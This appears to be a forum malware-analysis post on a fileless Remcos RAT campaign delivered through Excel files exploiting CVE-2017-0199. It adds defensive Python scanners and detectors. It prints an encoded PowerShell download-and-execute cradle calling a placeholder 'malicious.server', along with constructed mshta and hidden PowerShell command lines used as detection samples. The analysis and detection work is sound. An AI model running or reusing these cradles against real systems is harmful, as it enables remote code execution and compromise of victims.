Excel Exploit Spreads Fileless Remcos RAT

by x32x01
Cybercriminals are constantly finding new ways to trick users and bypass security tools. One of the latest and most dangerous techniques involves using Microsoft Excel files to spread a fileless version of Remcos RAT malware. This attack combines phishing, old but effective Office exploits, and in-memory execution to stay hidden for as long as possible. 😈

In this thread, we will break down the attack in a simple and clear way, explain how it works step by step, and show why it is still effective today. If you are interested in cybersecurity, malware analysis, or penetration testing, this deep dive will be very useful for you.


What Is Remcos RAT? 🖥️

Remcos RAT (Remote Control and Surveillance) is a commercial remote access tool sold as a legitimate remote administration product. Attackers have abused it so heavily for cybercrime that today it is far better known as malware than as an admin tool.

Once installed on a victim’s system, Remcos RAT allows attackers to:
  • Collect sensitive system information 📊
  • Control the computer remotely 🎮
  • Execute commands and scripts 🧠
  • Spy on users using the webcam and microphone 🎥🎙️
Because of its powerful features and ease of use, Remcos has become very popular among threat actors.


Why Fileless Malware Is So Dangerous ⚠️

Traditional malware writes an executable to disk, which is exactly what file scanners and signature-based antivirus are built to catch. Fileless malware skips that step.

In a fileless attack, the malware:
  • Runs directly in memory (RAM)
  • Uses trusted, signed system tools like PowerShell or mshta.exe to load itself
  • Leaves very few traces on disk (the lure spreadsheet still arrives as an attachment; it is the final RAT stage that never touches the filesystem)
This makes detection much harder for file-based antivirus and pushes defenders onto behavioural telemetry instead: process ancestry, command lines, script-block logging and memory scanning, which is where EDR earns its keep. 🕵️‍♂️


How the Excel Phishing Attack Starts 📧

The attack begins with a phishing email that looks like a purchase order or invoice. These emails are designed to create urgency and curiosity.

Common tricks used in the email:
  • Fake company names
  • Professional-looking language
  • An attached Microsoft Excel file 📎
Once the victim opens the Excel file, the real attack begins.


Exploiting Microsoft Office (CVE-2017-0199) 🧨

The malicious Excel document exploits a known Microsoft Office vulnerability, CVE-2017-0199, which Microsoft patched back in April 2017.
The bug is in how Office handles OLE objects that link to an external resource: when the document is opened, Office fetches the linked URL, and if the server answers with HTA content, Office hands it to the Windows HTA host (mshta.exe) and the script runs. No macro is involved, so "disable macros" alone does not stop it.

What Happens Behind the Scenes

  1. Opening the Excel file triggers the exploit: Office resolves the document's external OLE reference
  2. Office downloads a malicious HTA file from the attacker's server
  3. Office launches it with mshta.exe, a signed Windows tool, so the embedded script runs with the user's privileges
Even though this vulnerability is old, many systems are still unpatched, making the attack very effective. The chain also leaves a telltale: an Office process spawning mshta.exe, something a healthy workstation essentially never does.
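The external OLE reference described above lives in the document's relationship parts, so it can be spotted without opening the file in Office. The scanner below is an added example (not code from the original post or from any vendor write-up) that walks every `.rels` part of an OOXML package and flags relationships with `TargetMode="External"` whose target is a remote location and whose type is not an ordinary hyperlink. The two workbooks it checks are constructed inline and the 203.0.113.10 address is a documentation address, not a real server.

```python
"""Heuristic scanner for CVE-2017-0199-style external OLE references in OOXML
files (.xlsx/.docx).  Added example; not code from the original post or from
any vendor write-up.  It keys on the shape such documents need: a relationship
whose TargetMode is "External", whose Target is a remote location, and whose
type is not an ordinary hyperlink.  The workbooks below are constructed."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Remote = URL scheme or UNC path.  Hyperlinks legitimately point outside the file.
REMOTE_TARGET = re.compile(r"^(?:https?|ftp|file)://|^\\\\", re.I)
BENIGN_EXTERNAL = {"hyperlink"}
HIGH_RISK = {"oleObject"}  # an external OLE object is the CVE-2017-0199 pattern


def scan_ooxml(blob):
    """Return one finding per external, non-hyperlink relationship that points
    at a remote target, across every .rels part in the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                if rtype in BENIGN_EXTERNAL or not REMOTE_TARGET.match(target):
                    continue
                findings.append({
                    "part": part, "id": rel.get("Id"), "type": rtype, "target": target,
                    "severity": "high" if rtype in HIGH_RISK else "medium",
                })
    return findings


def build_workbook(sheet_rels_xml):
    """Constructed helper: the smallest .xlsx-shaped zip the scanner needs
    (one worksheet plus its relationship part).  Excel would not open it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("_rels/.rels", '<?xml version="1.0"?><Relationships xmlns="%s"/>' % REL_NS)
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        z.writestr("xl/worksheets/_rels/sheet1.xml.rels", sheet_rels_xml)
    return buf.getvalue()


# Constructed samples.  203.0.113.10 is a documentation address, not a real server.
MALICIOUS_XLSX = build_workbook((
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Relationships xmlns="%s">'
    '<Relationship Id="rId1" Type="%soleObject" '
    'Target="http://203.0.113.10/update.hta" TargetMode="External"/>'
    '</Relationships>') % (REL_NS, OFFICE_REL))

# A hyperlink out to the web and an OLE object embedded *inside* the package: both normal.
BENIGN_XLSX = build_workbook((
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Relationships xmlns="%s">'
    '<Relationship Id="rId1" Type="%shyperlink" Target="https://example.com/terms" TargetMode="External"/>'
    '<Relationship Id="rId2" Type="%soleObject" Target="../embeddings/oleObject1.bin"/>'
    '</Relationships>') % (REL_NS, OFFICE_REL, OFFICE_REL))

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_XLSX), ("benign", BENIGN_XLSX)):
        print(label, scan_ooxml(blob))
```

This covers only the OOXML form; the original CVE-2017-0199 samples were RTF with the object embedded via `\objdata`, which needs an RTF parser. For real triage reach for oletools (`oleobj` reports external relationships and handles RTF as well); the script above is just the core check, written out so it is clear what that tool is looking for.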


HTA File and Multi-Layer Obfuscation 🧩

The downloaded HTA file is heavily obfuscated to avoid detection. It uses multiple layers of:
  • JavaScript
  • Visual Basic Script (VBS)
  • PowerShell
Each layer decrypts or loads the next one, making analysis harder for security tools and analysts.

Example of Obfuscated PowerShell (Simplified)

Code:
# Base64 of UTF-16LE text, the same encoding PowerShell's -EncodedCommand expects
$encoded = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBhAGwAaQBjAGkAbwB1AHMALgBzAGUAcgB2AGUAcgAiACkA"
# Decodes to: IEX (New-Object Net.WebClient).DownloadString("http://malicious.server")
# Invoke-Expression (IEX) then runs whatever the server returns, straight from memory
IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encoded)))
The encoded string keeps the download-and-execute command away from simple keyword matching; the only thing left in plain sight is IEX, which is enough to run whatever comes back.
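Peeling these layers is the first job in analysis, and it is mechanical: find the base64 blob, decode it with the right text encoding, repeat. The script below is an added example (not from the original post) that does this for the three ways PowerShell droppers pass a blob: inline to `FromBase64String`, through a `-EncodedCommand`/`-enc` flag, or via a `$variable` as the post's snippet does. `SAMPLE` is the post's own two lines, with the trailing null byte the original base64 was missing restored so the closing parenthesis decodes; `NESTED_SAMPLE` is a three-layer chain constructed here, and its 203.0.113.10 URL is a documentation address, not a real C2.

```python
"""Peel the base64 layers of a PowerShell dropper and pull out indicators.
Added example, not from the original post.  It handles the two text encodings
such loaders use: UTF-16LE (what -EncodedCommand and [Text.Encoding]::Unicode
expect) and UTF-8.  SAMPLE is the post's snippet; NESTED_SAMPLE is constructed."""
import base64
import re

B64 = r"[A-Za-z0-9+/=]{16,}"
QUOTED_B64_ARG = re.compile(r"FromBase64String\(\s*['\"](%s)['\"]\s*\)" % B64)
VAR_B64_ARG = re.compile(r"FromBase64String\(\$(\w+)\)")
VAR_ASSIGN = re.compile(r"\$(\w+)\s*=\s*['\"](%s)['\"]" % B64)
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+['\"]?(%s)" % B64, re.I)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)
KEYWORDS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
            "FromBase64String", "-nop", "-w hidden", "Start-Process", "mshta")


def decode_layer(b64):
    """Base64-decode one blob.  ASCII text stored as UTF-16LE has a NUL in
    every second byte, so a NUL-heavy odd-byte stream is decoded as UTF-16LE
    (a dangling final byte becomes U+FFFD, as .NET does); else UTF-8.
    Returns None when the blob is not valid base64."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:
        return None
    if raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def find_blob(script):
    """Locate the next base64 payload in one layer, whether it is passed
    inline, through an -EncodedCommand flag, or via a $variable."""
    m = QUOTED_B64_ARG.search(script) or ENC_FLAG.search(script)
    if m:
        return m.group(1)
    ref = VAR_B64_ARG.search(script)
    if ref:
        return dict(VAR_ASSIGN.findall(script)).get(ref.group(1))
    return None


def peel(script, max_layers=10):
    """Return every layer, outermost first, stopping when no blob is left."""
    layers = [script]
    for _ in range(max_layers):
        blob = find_blob(layers[-1])
        decoded = decode_layer(blob) if blob else None
        if not decoded:
            break
        layers.append(decoded)
    return layers


def indicators(layers):
    """URLs and suspicious tokens across all decoded layers."""
    text = "\n".join(layers)
    return {
        "urls": sorted(set(URL.findall(text))),
        "keywords": [k for k in KEYWORDS if k.lower() in text.lower()],
    }


# The post's snippet (base64 completed to a whole final UTF-16 code unit).
SAMPLE = (
    '$encoded = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBhAGwAaQBjAGkAbwB1AHMALgBzAGUAcgB2AGUAcgAiACkA"\n'
    "IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encoded)))"
)

# Constructed three-layer chain: -enc (UTF-16LE) -> UTF-8 FromBase64String -> download cradle.
_inner = 'IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.10/a.hta")'
_middle = ('IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("%s")))'
           % base64.b64encode(_inner.encode()).decode())
NESTED_SAMPLE = "powershell -nop -w hidden -enc " + base64.b64encode(_middle.encode("utf-16-le")).decode()

if __name__ == "__main__":
    for script in (SAMPLE, NESTED_SAMPLE):
        layers = peel(script)
        for i, layer in enumerate(layers):
            print("layer %d: %s" % (i, layer[:90]))
        print(indicators(layers))
```

Real droppers add string concatenation, character-code arrays and a compression layer on top of this, so treat `peel` as the skeleton you extend per sample; the encoding heuristic is the part worth keeping, because guessing the wrong one turns a readable stage into NUL-studded garbage.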


Process Hollowing and In-Memory Execution 🧠

After the initial payload runs, the malware uses a technique called process hollowing to get Remcos into memory without ever writing its executable to disk.

What Is Process Hollowing?

Process hollowing works like this:
  1. A legitimate process is started in a suspended state (for example: explorer.exe), so its main thread never runs the original code
  2. Its original image is unmapped from memory, leaving an empty process shell with a valid name, path and signature
  3. The malicious image is written into that address space, the thread's entry point is pointed at it, and the thread is resumed
The result is a trusted process running malicious code: Task Manager, and any control that trusts the on-disk binary, sees only explorer.exe. 👻

In this attack, Remcos RAT is loaded directly into memory instead of being saved as a file. This makes it a true fileless variant. It is not invisible, though: the hollowing steps themselves (suspended process creation, unmapping, cross-process memory writes) and the mismatch between the process's on-disk image and what is actually mapped are exactly what EDR memory scanning and API telemetry key on.


What Can Remcos RAT Do on an Infected System 🛑

Once Remcos RAT is active, attackers gain almost full control over the system.

Key capabilities include:
  • Stealing files 📂
  • Logging keystrokes ⌨️
  • Capturing clipboard data 📋
  • Recording the screen 🎥
  • Managing services and processes ⚙️
  • Editing the Windows Registry 🧾
  • Downloading additional malware ⬇️
All commands are received from a Command and Control (C2) server.


Abuse of Legitimate Services Like DocuSign 🧾

Attackers are also abusing trusted platforms like DocuSign to make phishing attacks more convincing.

How the DocuSign Scam Works

  • Attackers create real, paid DocuSign accounts
  • They use DocuSign's APIs to generate fake invoice templates at scale
  • The emails look 100% legitimate, because DocuSign itself sends them
If a user signs the document, attackers can:
  • Request payment outside DocuSign
  • Forward signed documents to finance departments
This method bypasses many email security filters because the messages genuinely come from DocuSign's infrastructure and carry no malicious attachment or link; the fraud lives in the invoice text, which a mail filter is not built to judge.


ZIP File Concatenation to Bypass Detection 📦

Another advanced trick used in recent campaigns is ZIP file concatenation.
This technique appends one complete ZIP archive to another, producing a single file with two central directories. A ZIP reader locates entries through the central directory at the end of the file, and readers disagree on what to do when there is more than one: honour the first, honour the last, or try to show everything.

Why This Is Dangerous

  • 7-Zip, WinRAR, and Windows Explorer behave differently
  • Some tools may ignore the half that holds the malicious content
  • Security scanners may miss the payload entirely if they parse only one of the two archives
Attackers use this trick to target users based on the tools they use: the decoy goes in the half a scanner reads, the payload in the half the victim's archiver extracts.
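The disagreement is easy to reproduce. The added example below (not from the original post) builds two small archives with constructed contents, glues them together, and lists the result two ways: through the central directory, which is how a spec-following reader such as Python's `zipfile` finds entries (it honours the last end-of-central-directory record), and by carving local file headers from the start of the blob, which is what a naive scanner does. Any gap between the two views is the detection signal; so is more than one end-of-central-directory record.

```python
"""ZIP concatenation demo.  Added example, not from the original post.
Two archives with constructed content are built in memory, concatenated, and
listed (a) through the central directory, the way a compliant reader works,
and (b) by walking local file headers from offset 0, the way a carving scanner
works.  The two listings disagree, which is the whole trick and the whole tell."""
import io
import struct
import zipfile

LOCAL_HEADER_SIG = b"PK\x03\x04"
EOCD_SIG = b"PK\x05\x06"


def build_zip(files):
    """Constructed helper: an in-memory stored (uncompressed) archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as z:
        for name, data in files.items():
            z.writestr(name, data)
    return buf.getvalue()


def names_via_central_directory(blob):
    """What a spec-following reader sees.  zipfile searches backwards for the
    end-of-central-directory record, so the *last* archive's entries win."""
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        return z.namelist()


def names_via_local_headers(blob):
    """What a start-to-end carver sees: every local file header in the blob."""
    names, pos = [], 0
    while True:
        pos = blob.find(LOCAL_HEADER_SIG, pos)
        if pos < 0:
            return names
        # Local header layout: compressed size @18, uncompressed size @22,
        # name length @26, extra length @28, then the name at @30.
        csize, _usize, name_len, extra_len = struct.unpack_from("<IIHH", blob, pos + 18)
        names.append(blob[pos + 30:pos + 30 + name_len].decode("utf-8"))
        pos += 30 + name_len + extra_len + csize


def hidden_entries(blob):
    """Entries a carver finds that the active central directory does not
    list: the content a concatenated file hides from a compliant reader."""
    visible = set(names_via_central_directory(blob))
    return [n for n in names_via_local_headers(blob) if n not in visible]


def is_concatenated(blob):
    """Cheap check: a single well-formed archive has exactly one EOCD record.
    (Signature counting can false-positive on stored data that happens to
    contain it; a production scanner should parse rather than count.)"""
    return blob.count(EOCD_SIG) > 1


# Constructed archives: a harmless decoy and a stand-in "payload" (plain text, not a dropper).
DECOY = build_zip({"invoice.txt": b"Purchase order 4471, see attached."})
PAYLOAD = build_zip({"invoice.hta": b"<!-- constructed stand-in, not a real HTA dropper -->"})
COMBINED = DECOY + PAYLOAD

if __name__ == "__main__":
    print("central directory:", names_via_central_directory(COMBINED))
    print("local headers:    ", names_via_local_headers(COMBINED))
    print("hidden:           ", hidden_entries(COMBINED))
    print("concatenated?     ", is_concatenated(COMBINED))
```

Which half each tool honours is tool-specific (the post's point about 7-Zip, WinRAR and Explorer), so do not hard-code "the payload is second": flag the file whenever the two listings differ or more than one EOCD record is present, and extract both halves for scanning.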


Real-World Threat Actors Using These Techniques 🐺

A threat group known as Venture Wolf has been linked to phishing campaigns targeting industries like:
  • Manufacturing
  • Construction
  • IT services
  • Telecommunications
They use malware like MetaStealer, which is based on the RedLine Stealer codebase.


How to Protect Yourself and Your Organization 🛡️

To reduce the risk of these attacks, follow these best practices:
  • Keep Microsoft Office fully updated 🔄 (CVE-2017-0199 has had a patch since April 2017; a patched Office is simply not vulnerable to this chain)
  • Disable Office macros if not needed 🚫 (good hygiene in general, but this attack uses no macros, so it is no substitute for patching)
  • Block mshta.exe where nothing needs it (AppLocker/WDAC), or at least stop Office from spawning it with the attack surface reduction rule "Block all Office applications from creating child processes"
  • Monitor PowerShell and mshta.exe usage 👀: process-creation events with command lines (Sysmon Event ID 1 or Windows 4688) and PowerShell script-block logging (Event ID 4104) expose the encoded one-liner even when nothing is written to disk
  • Train users to spot phishing emails 🎓
  • Use endpoint detection that inspects process ancestry and memory, not just files on disk
Prevention and awareness are your strongest defenses.
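What the monitoring point looks like in practice: the Excel → mshta.exe → powershell.exe chain from the exploit steps above is a process-ancestry pattern, and it can be matched from process-creation telemetry alone. The detection logic below is an added example (not from the original post) that runs over constructed events shaped like Sysmon Event ID 1 (pid, parent pid, image path, command line). The paths, pids and the 203.0.113.10 URL are placeholders, and the encoded blob in the sample is truncated.

```python
"""Process-ancestry detection for the Excel -> mshta -> PowerShell chain.
Added example, not from the original post.  Runs over constructed
process-creation events (Sysmon Event ID 1 shape); all values are placeholders."""
import os
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Signed Windows binaries that an Office application has no business launching.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
           "cmd.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe"}
REMOTE_ARG = re.compile(r"https?://", re.I)
ENCODED_PS = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)

# Constructed sample telemetry: one malicious chain, one legitimate scheduled script.
EVENTS = [
    {"pid": 4100, "ppid": 3012, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmd": r'"EXCEL.EXE" "C:\Users\finance\Downloads\PO-4471.xlsx"'},
    {"pid": 4388, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe http://203.0.113.10/update.hta"},
    {"pid": 4512, "ppid": 4388, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQ=="},  # blob truncated
    {"pid": 5000, "ppid": 600, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 5100, "ppid": 5000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
]


def basename(path):
    """Lower-cased image name; tolerates Windows paths on any host OS."""
    return os.path.basename(path.replace("\\", "/")).lower()


def lineage(events, pid, max_depth=8):
    """Image names from the process up to its oldest ancestor in the data."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid and len(chain) < max_depth:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Return (pid, rule) alerts.  Rules:
    office_child_lolbin  - a LOLBin anywhere beneath an Office process
    mshta_remote_url     - mshta.exe fetching its script over HTTP(S)
    encoded_powershell   - PowerShell started with an encoded command"""
    alerts = []
    for e in events:
        chain = lineage(events, e["pid"])
        image, ancestors = chain[0], chain[1:]
        if image in LOLBINS and any(a in OFFICE_APPS for a in ancestors):
            alerts.append((e["pid"], "office_child_lolbin"))
        if image == "mshta.exe" and REMOTE_ARG.search(e["cmd"]):
            alerts.append((e["pid"], "mshta_remote_url"))
        if image in {"powershell.exe", "pwsh.exe"} and ENCODED_PS.search(e["cmd"]):
            alerts.append((e["pid"], "encoded_powershell"))
    return alerts


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule, "<-", " <- ".join(lineage(EVENTS, pid)))
```

The ancestry walk is what makes this robust: the PowerShell stage is two hops away from Excel, so a rule that only looks at the direct parent would fire on mshta.exe but miss the stage that actually matters. The nightly backup script in the sample shows the other side, a PowerShell launch with a normal parent and a plain `-File` argument that stays quiet. In a SIEM the same logic maps onto Sysmon Event ID 1 or Windows 4688 with command-line auditing enabled.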


Final Thoughts 🧠

This campaign shows how attackers combine old vulnerabilities, trusted tools, and social engineering to create highly effective attacks. Fileless delivery of Remcos RAT is especially dangerous because the RAT lives only in memory and sidesteps file-based detection.

Understanding how these attacks work is the first step toward defending against them. Stay updated, stay cautious, and always think before opening unexpected attachments. 🔐